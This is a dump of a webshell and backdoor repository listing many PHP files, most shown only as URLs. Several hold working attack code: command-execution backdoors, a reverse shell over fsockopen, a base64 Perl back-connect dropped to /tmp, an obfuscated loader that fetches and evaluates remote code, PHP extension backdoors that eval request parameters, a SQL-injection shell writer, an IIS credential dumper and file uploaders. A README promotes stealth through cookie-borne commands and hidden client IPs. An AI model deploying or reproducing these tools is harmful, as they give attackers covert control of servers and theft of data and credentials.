https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/PHP-Shell-Detector-master.zip


--------------------------------------------------------------------------------
/Php/PHPRemoteView.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/PHPRemoteView.php


--------------------------------------------------------------------------------
/Php/PHP小马 - ExpDoor.com.php:
--------------------------------------------------------------------------------
 1 | OK!";
 7 | else
 8 | echo "Error!";
 9 | }
10 | ?>
11 | 
12 |  PHP小马 - ExpDoor.com
13 | 
    
14 | 

    
15 | 
    
16 | 
    
17 | 
    
18 | 
    


--------------------------------------------------------------------------------
/Php/PHP整站打包程序-By DoDo.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/PHP整站打包程序-By DoDo.php


--------------------------------------------------------------------------------
/Php/PHP检测文件夹权限.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/PHP检测文件夹权限.php


--------------------------------------------------------------------------------
/Php/PHVayv.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/PHVayv.php


--------------------------------------------------------------------------------
/Php/PH_Vayv.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/PH_Vayv.php


--------------------------------------------------------------------------------
/Php/Php Backdoor v 1.0 by ^Jerem.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Php Backdoor v 1.0 by ^Jerem.php


--------------------------------------------------------------------------------
/Php/PhpSpy Ver 2006.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/PhpSpy Ver 2006.php


--------------------------------------------------------------------------------
/Php/README.md:
--------------------------------------------------------------------------------
 1 | Contributing
 2 | ============
 3 | To contribute other shells not listed here... Fork, Push the changes to your repo, then before you request for a Pull, make sure to include a simple description of your **php** web-shell and include a screen-shot of the web-shell (as hosted in your localhost).
 4 | 
 5 | 
 6 | 
 7 | 
 8 | php-webshells
 9 | =============
10 | 
11 | Common php webshells. Do not host the file(s) in your server!
12 | 
13 | ++++++++++++++++++++++++++
14 | 
15 | Though I recommend one-liners like 
16 | 
17 | 
18 | 
19 | (Not a full fledged webshell, but works fine)
20 | 
21 | =================================================================
22 | 
23 | You can try WebHandler for one-liners.
24 | 
25 | WebHandler.py works for POST and GET requests:
26 | 
27 |     
28 |     
29 |     
30 | 
31 | 
32 | 


--------------------------------------------------------------------------------
/Php/SPS-3.0免杀.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/SPS-3.0免杀.php


--------------------------------------------------------------------------------
/Php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php


--------------------------------------------------------------------------------
/Php/Security House - Shell Center - Edited By KingDefacer.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Security House - Shell Center - Edited By KingDefacer.php


--------------------------------------------------------------------------------
/Php/Serv-U本地权限提升工具.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Serv-U本地权限提升工具.php


--------------------------------------------------------------------------------
/Php/Shell [ci] .Biz was here.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Shell [ci] .Biz was here.php


--------------------------------------------------------------------------------
/Php/Silic Group Hacker Army - BlackBap.Org.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Silic Group Hacker Army - BlackBap.Org.php


--------------------------------------------------------------------------------
/Php/Silic Group php Webshell v3.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Silic Group php Webshell v3.php


--------------------------------------------------------------------------------
/Php/Simple_PHP_backdoor_by_DK.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | ";
 8 |         $cmd = ($_REQUEST['cmd']);
 9 |         system($cmd);
10 |         echo "
    ";
11 |         die;
12 | }
13 | 
14 | ?>
15 | 
16 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
17 | 
18 | 
19 | 
20 | 


--------------------------------------------------------------------------------
/Php/Sincap 1.0.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Sincap 1.0.php


--------------------------------------------------------------------------------
/Php/SnIpEr_SA Shell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/SnIpEr_SA Shell.php


--------------------------------------------------------------------------------
/Php/Sosyete Safe Mode Bypass Shell - Edited By KingDefacer.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Sosyete Safe Mode Bypass Shell - Edited By KingDefacer.php


--------------------------------------------------------------------------------
/Php/Spider PHP Shell (SPS-3.0).php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Spider PHP Shell (SPS-3.0).php


--------------------------------------------------------------------------------
/Php/Uploader.php:
--------------------------------------------------------------------------------
 1 | 
    
 2 | 
 3 | Send this file: 
 4 | 
 5 | 
    
 6 | 
 9 | 
10 | 


--------------------------------------------------------------------------------
/Php/Uploading.php:
--------------------------------------------------------------------------------
 1 | 
17 | 
    
18 | 
     Uploading 
    
19 | 

    
20 | 
    
21 | 
22 | 
23 | 
24 | 

    
25 | 
26 | 
     ';
28 | echo '
29 | 
30 | '; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
31 | {
32 | echo 'Archivo subido!

    ';
33 | }
34 | else
35 | {
36 | echo 'Upload Fail!

    ';
37 | }
38 | }
39 | 
40 | ?>
41 | 


--------------------------------------------------------------------------------
/Php/Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition.php


--------------------------------------------------------------------------------
/Php/WordPress Shell.php:
--------------------------------------------------------------------------------
 1 | 
12 | 
    
13 | Command: ">
14 | 
15 | 
    
16 | 
    17 | &1");} ?>
18 | 
    


--------------------------------------------------------------------------------
/Php/ZoRBaCK Connect.php:
--------------------------------------------------------------------------------
 1 | ZoRBaCK Connect' );
16 | 
17 | echo "
    ZoRBaCK Connect
     
18 |             Usage: nc -vv -l -p 21
    
19 |             
     
20 |             

     
21 |             Your IP & Port:
     
22 |             
23 |             

     
24 |             

    
25 |             
    
26 |             
    "; 
27 |             
28 |          $ipim=$_POST['ipim']; 
29 |          $portum=$_POST['portum']; 
30 |          if ($ipim <> "") 
31 |          { 
32 |          $mucx=fsockopen($ipim , $portum , $errno, $errstr ); 
33 |          if (!$mucx){ 
34 |                $result = "Error: didnt connect !!!"; 
35 |          } 
36 |          else { 
37 |          
38 |          $zamazing0="\n";
39 |                   
40 |          fputs ($mucx ,"\nwelcome ZoRBaCK\n\n");
41 |          fputs($mucx , system("uname -a") .$zamazing0 );
42 |          fputs($mucx , system("pwd") .$zamazing0 );
43 |          fputs($mucx , system("id") .$zamazing0.$zamazing0 );
44 |          while(!feof($mucx)){  
45 |        fputs ($mucx); 
46 |        $one="[$";
47 |        $two="]";
48 |        $result= fgets ($mucx, 8192); 
49 |       $message=`$result`; 
50 |        fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n"); 
51 |       } 
52 |       fclose ($mucx); 
53 |          } 
54 |          } 
55 | 
56 | ?>


--------------------------------------------------------------------------------
/Php/ZyklonShell.php:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 404 Not Found
4 | 
5 | 
    Not Found
    
6 | The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.
    
7 | 
8 | 


--------------------------------------------------------------------------------
/Php/aZRaiLPhp v1.0.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/aZRaiLPhp v1.0.php


--------------------------------------------------------------------------------
/Php/aZRaiLPhp_v1.0.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/aZRaiLPhp_v1.0.php


--------------------------------------------------------------------------------
/Php/accept_language.php:
--------------------------------------------------------------------------------
1 |  by q1w2e3r4'; ?>
2 | 


--------------------------------------------------------------------------------
/Php/angel.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/angel.php


--------------------------------------------------------------------------------
/Php/azrail 1.0 by C-W-M.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/azrail 1.0 by C-W-M.php


--------------------------------------------------------------------------------
/Php/backdoorfr.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/backdoorfr.php


--------------------------------------------------------------------------------
/Php/bitwise.php:
--------------------------------------------------------------------------------
 1 | ');
24 | 	$source = '~'.(~$source);
25 | 	
26 | 	$shellcode = '';
32 | 	
33 | 	file_put_contents($output, $shellcode);
34 | ?>
35 | 


--------------------------------------------------------------------------------
/Php/blackbin/404super.php:
--------------------------------------------------------------------------------
 1 |  pack('c*', 0x70, 0x61, 99, 107),
15 |     'c' => $i('c*', 99, 97, 108, 108, 95, 117, 115, 101, 114, 95, 102, 117, 110, 99),
16 |     'f' => $i('c*', 102, 105, 108, 101, 95, 103, 101, 116, 95, 99, 111, 110, 116, 101, 110, 116, 115),
17 |     'e' => $i('c*',0x63,0x72,0x65,0x61,0x74,0x65,0x5f,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e),
18 |     'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),
19 |     's' =>$i('c*',0x73,0x70,0x72,0x69,0x6e,0x74,0x66)
20 | );
21 | if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}
22 | $GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSION['t']))));
23 | ?>


--------------------------------------------------------------------------------
/Php/blackbin/v1/make2.php:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/Php/blackbin/v1/readme.md:
--------------------------------------------------------------------------------
 1 | look here:
 2 | 
 3 | http://blog.wangzhan.360.cn/?p=65
 4 | 
 5 | 
 6 | demo :
 7 | 
 8 | first you open webshell  is  "404", then enter "p", after show login page
 9 | 
10 | pass: demo123456


--------------------------------------------------------------------------------
/Php/bns-php-shell/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2014 cybernoir
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 
23 | 


--------------------------------------------------------------------------------
/Php/bns-php-shell/README.md:
--------------------------------------------------------------------------------
 1 | Basic and Stealthy PHP webshell
 2 | ===============================
 3 | 
 4 | **THIS SCRIPT IS ONLY FOR ADMINISTRATION OF SERVERS YOU OWN! Author is not responsible for wrong usage of this script.**
 5 | 
 6 | BNS webshell has two parts. One part (server.php) has to be uploaded to remote server you wish to control. Second part (client.php) is your local client. You can run it on your own PC or upload it to another remote server.
 7 | 
 8 | ![BNS client screenshot](https://i.imgur.com/mjorwMZ.png)
 9 | 
10 | **Usage:**
11 | 
12 | First of all upload server.php to remote server. After that open client.php and insert full path of server.php to "Shell URL" field. Press "Check" button to see if shell is active.
13 | 
14 | **Key advantages of BNS shell:**
15 | 
16 | - Small size. You can insert only one string of php code to any script and get full controll of server.
17 | 
18 | - Stealthy. All commands are sent via COOKIES. Target server logs will just show GET requests to server.php.
19 | 
20 | - Has OS shell, PHP shell and basic file manager.
21 | 
22 | - Client-server architecture. You can run shell client on other remote server to completely hide your home IP.


--------------------------------------------------------------------------------
/Php/bns-php-shell/server.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 |     
 4 |     
 5 |         
    This script has hidden php shell!
    
 6 |         
    Example of script that should be uploaded to server you wish to control remotely.
    
 7 |     
 8 | 
 9 | 
10 | 


--------------------------------------------------------------------------------
/Php/c999shell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/c999shell.php


--------------------------------------------------------------------------------
/Php/change.php:
--------------------------------------------------------------------------------
 1 | 'perl','c'=>'c');
47 | 
48 | $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
49 | "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
50 | "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
51 | "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
52 | "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
53 | "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
54 | "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
55 | 
56 | cf('/tmp/.bc',$back_connect);
57 | $res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
58 | 
59 | ?>
60 | 
61 | 


--------------------------------------------------------------------------------
/Php/cw.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/cw.php


--------------------------------------------------------------------------------
/Php/cybershell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/cybershell.php


--------------------------------------------------------------------------------
/Php/erne.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/erne.php


--------------------------------------------------------------------------------
/Php/ex0shell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/ex0shell.php


--------------------------------------------------------------------------------
/Php/exp.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/exp.php


--------------------------------------------------------------------------------
/Php/fatal.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/fatal.php


--------------------------------------------------------------------------------
/Php/get.php:
--------------------------------------------------------------------------------
 1 | array(
24 |             "method"=>"GET",
25 |             "header"=>"",
26 |             "timeout"=>$timeout)
27 |         );
28 |         $context = stream_context_create($opts);
29 |         if(@copy($url, $file, $context)) {
30 |             //$http_response_header
31 |             return $file;
32 |         } else {
33 |             return false;
34 |         }
35 |     }
36 | }
37 | ?>


--------------------------------------------------------------------------------
/Php/gfs_sh.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/gfs_sh.php


--------------------------------------------------------------------------------
/Php/iMHaPFtp.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/iMHaPFtp.php


--------------------------------------------------------------------------------
/Php/kral.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/kral.php


--------------------------------------------------------------------------------
/Php/license.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/license.zip


--------------------------------------------------------------------------------
/Php/listfile.php:
--------------------------------------------------------------------------------
 1 | ";
 3 | function getFile($path,$charset) {
 4 |      header("Content-Type:text/html;charset=".$charset);
 5 |      if (is_dir($path)) {
 6 |           $dir = opendir ( $path );
 7 |           while ( $file = readdir ( $dir ) ) {
 8 |                echo "".$file."
    ";
 9 |           }
10 |           closedir($dir);
11 |      } else {
12 |           echo "File:
13 |           
14 |           
15 |           
    ";
16 |           echo "";
17 |      }
18 |      echo "";
19 | }
20 | function update($filename,$data){
21 |      file_put_contents($filename, $data);
22 |      echo "";
23 | }
24 | if('update'==@$_POST['action']){
25 |      update($_POST['file'],$_POST['data']);
26 | }else if('delete'==@$_POST['action']){
27 |      if(file_exists($_POST['file'])){
28 |           unlink($_POST['file']);
29 |           echo "";
30 |      }
31 | }else{
32 |      getFile(@$_POST['p']!=''?$_POST['p']:$_SERVER['DOCUMENT_ROOT'],@$_POST['charset']!=''?$_POST['charset']:"UTF-8");
33 | }
34 | ?>
35 | 


--------------------------------------------------------------------------------
/Php/load_shell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/load_shell.php


--------------------------------------------------------------------------------
/Php/mod_joomla_shell.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/mod_joomla_shell.zip


--------------------------------------------------------------------------------
/Php/moon_1php.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/moon_1php.php


--------------------------------------------------------------------------------
/Php/myshell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/myshell.php


--------------------------------------------------------------------------------
/Php/nShell v1.0.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/nShell v1.0.php


--------------------------------------------------------------------------------
/Php/nsT View.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/nsT View.php


--------------------------------------------------------------------------------
/Php/nshell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/nshell.php


--------------------------------------------------------------------------------
/Php/pHpINJ.php:
--------------------------------------------------------------------------------
 1 | 
 3 | 
 4 | 
 5 | || .::News Remote PHP Shell Injection::. ||   
 6 | 
 7 | 
 8 | 
    ||   .::News PHP Shell Injection::.   ||
     
     
    
 9 | ' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile";
15 | $sql = urlencode($sql);
16 | $expurl= $url."?id=".$sql ;
17 | echo ' Click Here to Exploit  
    ';
18 | echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results";
19 | }
20 | else
21 | {
22 | ?>
23 | Url to index.php: 
     
24 | 
    " method = "post">
25 |  
    
26 | Server Path to Shell: 
    
27 | Full server path to a writable file which will contain the Php Shell 
    
28 |  
     
    
29 |  
     
    
30 | 
31 | 
32 | 
33 | 
36 | 
37 | 


--------------------------------------------------------------------------------
/Php/php-extension-backdoor/README.md:
--------------------------------------------------------------------------------
1 | Windows:
2 | http://stackoff.ru/pishem-rasshirenie-bekdor-dlya-php/
3 | 
4 | Linux:  
5 | `sudo apt-get install php5-dev`  
6 | `phpize && ./configure && make`


--------------------------------------------------------------------------------
/Php/php-extension-backdoor/lin/backdoor.c:
--------------------------------------------------------------------------------
 1 | #include "php.h"
 2 | PHP_RINIT_FUNCTION(hideme);
 3 | zend_module_entry hideme_ext_module_entry = {
 4 |     STANDARD_MODULE_HEADER,
 5 |     "simple backdoor",
 6 |     NULL,
 7 |     NULL,
 8 |     NULL,
 9 |     PHP_RINIT(hideme),
10 | 	NULL, 
11 | 	NULL,
12 |     "1.0",
13 |     STANDARD_MODULE_PROPERTIES
14 | };
15 | ZEND_GET_MODULE(hideme_ext);
16 | 
17 | PHP_RINIT_FUNCTION(hideme)
18 | {
19 | 
20 | 	char* method = "_GET"; // суперглобальный массив, из которого берем пераметр и значение
21 | 	char* secret_string = "execute"; // параметр в котором будет evil-код
22 | 	zval** arr;
23 | 	char* code;
24 | 
25 | 	if (zend_hash_find(&EG(symbol_table), method, strlen(method) + 1, (void**)&arr) != FAILURE) { 
26 | 		HashTable* ht = Z_ARRVAL_P(*arr);
27 | 		zval** val;
28 | 		if (zend_hash_find(ht, secret_string, strlen(secret_string) + 1, (void**)&val) != FAILURE) { // поиск нужного параметра в хеш-таблице
29 | 			code =  Z_STRVAL_PP(val); // значение параметра
30 | 			zend_eval_string(code, NULL, (char *)"" TSRMLS_CC); // выполнение кода
31 | 		}
32 | 	}
33 | 	return SUCCESS;
34 | }


--------------------------------------------------------------------------------
/Php/php-extension-backdoor/lin/config.m4:
--------------------------------------------------------------------------------
1 | PHP_ARG_ENABLE(back, 0,0)
2 | PHP_NEW_EXTENSION(back, backdoor.c, $ext_shared)


--------------------------------------------------------------------------------
/Php/php-extension-backdoor/win/hideme.cpp:
--------------------------------------------------------------------------------
 1 | #include "stdafx.h"
 2 | #include "zend_config.w32.h"
 3 | #include "php.h"
 4 | 
 5 | PHP_RINIT_FUNCTION(hideme);
 6 | zend_module_entry hideme_ext_module_entry = {
 7 |     STANDARD_MODULE_HEADER,
 8 |     "hideme",
 9 |     NULL,
10 |     NULL,
11 |     NULL,
12 |     PHP_RINIT(hideme),
13 | 	NULL, 
14 | 	NULL,
15 |     "1.0",
16 |     STANDARD_MODULE_PROPERTIES
17 | };
18 | ZEND_GET_MODULE(hideme_ext);
19 | 
20 | PHP_RINIT_FUNCTION(hideme)
21 | {
22 | 
23 | 	char* method = "_POST"; // суперглобальный массив, из которого берем пераметр и значение
24 | 	char* secret_string = "secret_string"; // параметр в котором будет evil-код
25 | 	zval** arr;
26 | 	char* code;
27 | 
28 | 	if (zend_hash_find(&EG(symbol_table), method, strlen(method) + 1, (void**)&arr) != FAILURE) { 
29 | 		HashTable* ht = Z_ARRVAL_P(*arr);
30 | 		zval** val;
31 | 		if (zend_hash_find(ht, secret_string, strlen(secret_string) + 1, (void**)&val) != FAILURE) { // поиск нужного параметра в хеш-таблице
32 | 			code =  Z_STRVAL_PP(val); // значение параметра
33 | 			zend_eval_string(code, NULL, (char *)"" TSRMLS_CC); // выполнение кода
34 | 		}
35 | 	}
36 | 	return SUCCESS;
37 | }


--------------------------------------------------------------------------------
/Php/php-extension-backdoor/win/stdafx.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #ifndef STDAFX
 4 | 
 5 | #define STDAFX
 6 | 
 7 | #include "zend_config.w32.h" 
 8 | #include "php.h"
 9 | 
10 | #endif


--------------------------------------------------------------------------------
/Php/phpinfo.php:
--------------------------------------------------------------------------------
1 | Name)){
 7 | 
 8 |    
 9 |       $webSite=new COM("IIS://localhost/w3svc/".$obj3w->Name.'/Root');
10 |       echo "[ID    ] " .$obj3w->Name.'
    ';
11 |       echo "[NAME  ] " .$obj3w->ServerComment.'
    ';
12 |       $state=intval($obj3w->ServerState);
13 |       if ($state==2) {
14 |      
15 |           echo "[STATE ] running".'
    ';
16 |       }
17 |      
18 |       if ($state==4) {
19 |      
20 |           echo "[STATE ] stoped".'
    ';
21 |       }
22 | 
23 |       if ($state==6) {
24 |      
25 |           echo "[STATE ] paused".'
    ';
26 |       }
27 | 
28 |       foreach ($obj3w->ServerBindings as $Binds){
29 | 
30 |           echo "[HOST  ] "  .$Binds.'
    ';
31 | 
32 |       }
33 |       echo "[USER  ] " . $webSite->AnonymousUserName.'
    ';
34 |       echo "[PASS  ] " . $webSite->AnonymousUserPass.'
    ';
35 |       echo "[PATH  ] " . $webSite->path.'
    ';
36 |       echo "-------------------------------------------".'
    ';
37 | 
38 |   }
39 | }
40 | 
41 | ?>
42 | 


--------------------------------------------------------------------------------
/Php/pws.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
    Input command :
    
 4 | 
 5 | 
    
 6 | 
     7 | 
13 | 
    
14 | 
    
15 | 
    Uploader file :
    
16 | 
17 |      
    
27 | 
28 |  ">
29 |  
30 |  
31 | 	  
32 |     
33 | 
34 | 
35 | 
36 | 


--------------------------------------------------------------------------------
/Php/r57shell127.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/r57shell127.php


--------------------------------------------------------------------------------
/Php/rootshell.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/rootshell.php


--------------------------------------------------------------------------------
/Php/ru24_post_sh.php:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | Ru24PostWebShell - ".$_POST['cmd']."
13 | 
14 | ";
15 | echo "";
16 | echo "";
17 | echo "";
18 | echo "
    ";
19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
20 | echo "".$function($_POST['cmd'])."
    ";
21 | 
22 | 
23 | ?>
24 | 


--------------------------------------------------------------------------------
/Php/s72 Shell v1.0 Codinf by Cr@zy_King.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/s72 Shell v1.0 Codinf by Cr@zy_King.php


--------------------------------------------------------------------------------
/Php/s72 Shell v1.1 Coding.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/s72 Shell v1.1 Coding.php


--------------------------------------------------------------------------------
/Php/s72_Shell_v1.1_Coding.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/s72_Shell_v1.1_Coding.php


--------------------------------------------------------------------------------
/Php/safe0ver.php:
--------------------------------------------------------------------------------
